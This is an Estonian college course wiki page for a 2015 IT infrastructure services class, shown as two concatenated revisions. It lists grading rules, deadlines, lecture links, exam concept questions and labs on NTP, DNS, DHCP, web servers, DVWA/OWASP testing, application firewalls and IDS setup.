Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

== Teemad 2015 ==

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-11T10:20:20Z

Mernits: /* Teemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

== Teemad 2015 ==

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

